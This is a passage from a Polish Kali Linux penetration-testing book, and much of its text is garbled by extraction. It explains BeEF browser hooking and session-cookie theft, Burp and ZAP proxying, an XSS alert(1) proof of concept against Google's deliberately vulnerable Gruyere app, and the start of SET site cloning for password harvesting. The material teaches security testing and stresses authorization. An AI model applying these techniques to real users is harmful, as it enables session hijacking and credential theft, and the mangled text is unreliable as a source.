prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Spis tre ci
8
Kup książkę Poleć książkę
6
Ataki na aplikacjeinternetowe
i serwery WWW
W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-
ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew
Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
232
systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS
BeEF mdash Browser Exploitation Framework
Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych
Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox
Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux
Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
233
apt-get updateapt-get install beef-xss
Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF
Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku
Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew
Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
234
W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef
Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
235
Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji
BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
